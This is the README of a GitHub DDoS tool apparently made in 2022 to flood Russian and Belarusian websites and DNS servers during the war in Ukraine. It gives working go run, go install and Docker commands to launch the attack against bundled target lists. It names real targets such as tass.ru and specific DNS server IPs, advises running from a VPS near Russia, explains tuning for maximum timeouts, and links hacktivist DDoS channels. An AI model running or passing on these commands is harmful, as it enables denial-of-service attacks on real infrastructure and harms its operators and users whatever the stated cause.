If this repo becomes taken down, then it is a sign that GitHub supports war atrocities commited by putin!
IMPORTANT!!! Please take your security seriously and use VPN while running this software from your own devices(PC/Laptop/Android/etc)!
NOTE: Since this app is not signed by any certificate for obvious reasons, Windows Defender will complain that this app is from an unknown source. It is safe to run this app anyway unless it was downloaded from another location. In which case the app may be altered, so be vigilant and compare the hashes of your binaries!
This repository was created in order to help defend against Russia propaganda during the war activities of Russian armies in Ukraine 2022.
There are two variants of the program:
- GUI
- CLI
For GUI simply download the latest program for your operating system from the Releases section. It is possible to run CLI program using Docker.
RusskijKorablIdiNaxuj.exe.zip
for Windows platformsRusskijKorablIdiNaxuj.apk
for Android platformsRusskijKorablIdiNaxuj.tar.xz
for Linux platforms- Please build manually for Mac-OS.
After executing the binary there will be a window similar to the one in the screenshot above. If you have a less formidable PC, then reduce "Workers" number to something like 500. Then you can click on the little triangle on the right and start the process.
NOTE: Windows may complain that the app is not signed or from unknown publisher. This is normal since it was not signed by a legitimate Windows certificate for obvious reasons(well, developers must register and obtain this certificate from Microsoft when they want to publish their apps).
Just clone this repo, install Go and from clonned directory do (preferrably on a VPS that is close to Russia):
go run ./cmd/RusskijKorablIdiNaxuj-cli -i targets/targets.txt
Also, you can install the GUI executable using this command(although you will still need Fyne dependencies for your system):
go install github.com/RusskijKorablIdiNaxuj/RusskijKorablIdiNaxuj@latest
Or the following command for the cli version:
go install github.com/RusskijKorablIdiNaxuj/RusskijKorablIdiNaxuj/cmd/RusskijKorablIdiNaxuj-cli@latest
NOTE: It may consume a lot of RAM as it tries to leave connections open for a as long time as possible. Minimum 4GB is needed.
You can run docker for all targets at the same time using this command:
docker run -d --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest
If it is crashing due to OOM:
docker run -d --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest -N 1000
You can also specify different target lists using -i app/{target}.json
, where {target}
can be one of:
- all.json
- belarus.json
- russia.json
- api.json
- dns.json
It is possible to see attack progress using this command:
docker run -i --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest -N 1000 -i /app/dns.json -s=false
The output will be something like this:
root@putinhujlo-ch1:~/RusskijKorablIdiNaxuj# docker run -i --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest -N=5000 -i /app/dns.json -s=false
dns://194.54.14.186:53 0 % [---------------------------] 0 / -1
dns://194.54.14.186:53 5 % [>--------------------] 193 / 3978
dns://194.54.14.187:53 6 % [>--------------------] 226 / 3685
dns://194.67.7.1:53 94 % [===================>-] 4993 / 5284
dns://194.67.2.109:53 90 % [==================>--] 3058 / 3414
The progress bar shows how many timeouts there are relative to the requests per second. The higher this ratio to 100% the better!
NOTE: You can also specify single targets using -i
command, e.g. -i https://tass.ru/
(it must have either http or https. Also, dns://
works too for dns query flood)
- International Ukraine DDOS Alliance Telegram: https://t.me/ukraineddos
- IT ARMY of Ukraine Telegram: https://t.me/itarmyofukraine2022
Either create an issue or a PR.